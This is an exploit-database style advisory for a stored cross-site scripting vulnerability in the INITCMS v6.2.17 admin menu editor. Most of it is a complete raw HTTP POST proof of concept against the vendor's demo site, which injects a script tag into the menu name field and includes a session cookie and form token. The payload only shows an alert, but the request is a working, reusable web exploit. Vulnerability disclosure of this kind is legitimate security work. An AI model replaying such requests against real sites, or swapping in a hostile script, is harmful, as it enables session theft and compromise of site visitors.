# Exploit Title: INITCMS v6.2.17 - Stored Cross-Site Scripting # Google Dork: N/A # Date: 2025-09-06 [YYYY/MM/DD] # Exploit Author: Osman Aydoğan # Vendor Homepage: initcms.com # Vulnerable Software --> [ https://github.com/networking/init-cms-bundle/releases/tag/v6.2.17 ] # Demo Page: https://demo.initcms.com # Affected Version: [ v6.2.17 ] # CVE-ID: N/A # Tested on: Windows 10 # Vulnerable Parameter Type: POST # Vulnerable Parameter: http://127.0.0.1/admin-panel-path/index.php?p=admin/actions/entries/save-entry # Attack Pattern: <script>alert("OsmanXSS")</script> # Description Allows it to run a Cross-Site Scripting by saving a new menu from the menus tab. # Proof of Concepts: POST /admin/cms/menu/create?uniqid=s68bc9a3f556f3&subclass=menu%20item HTTP/2 Host: demo.initcms.com Cookie: PHPSESSID=4740579a48b200d5d131481e1c3242b1; _locale=en Content-Length: 1430 Sec-Ch-Ua-Platform: "Windows" Accept-Language: tr-TR,tr;q=0.9 Sec-Ch-Ua: "Chromium";v="139", "Not;A=Brand";v="99" Sec-Ch-Ua-Mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Accept: application/json, text/plain, */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNAQ1qyfrVjjKL7Xf Origin: https://demo.initcms.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.initcms.com/admin/cms/menu/list Accept-Encoding: gzip, deflate, br Priority: u=1, i ------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf Content-Disposition: form-data; name="s68bc9a3f556f3[name]" <script>alert("OsmanXSS")</script> ------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf Content-Disposition: form-data; name="s68bc9a3f556f3[locale]" en ------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf Content-Disposition: form-data; name="s68bc9a3f556f3[page]" 41 ------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf Content-Disposition: form-data; name="s68bc9a3f556f3[redirect_url]" ------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf Content-Disposition: form-data; name="s68bc9a3f556f3[internal_url]" ------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf Content-Disposition: form-data; name="s68bc9a3f556f3[visibility]" public ------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf Content-Disposition: form-data; name="s68bc9a3f556f3[link_target]" ------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf Content-Disposition: form-data; name="s68bc9a3f556f3[link_class]" ------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf Content-Disposition: form-data; name="s68bc9a3f556f3[link_rel]" ------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf Content-Disposition: form-data; name="s68bc9a3f556f3[menu]" 40 ------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf Content-Disposition: form-data; name="s68bc9a3f556f3[_token]" f8a2e368078aad7c0522335.dsUFhXi327vaOMPE1b3x1iUQJR7Fxu1_jOacFTkBf9Q.OI5gti3648u-a42bt-Kwm3NyZCq3sKYSu4LDJWhsPZkFgHGxKdma9Y1LsA ------WebKitFormBoundaryNAQ1qyfrVjjKL7Xf--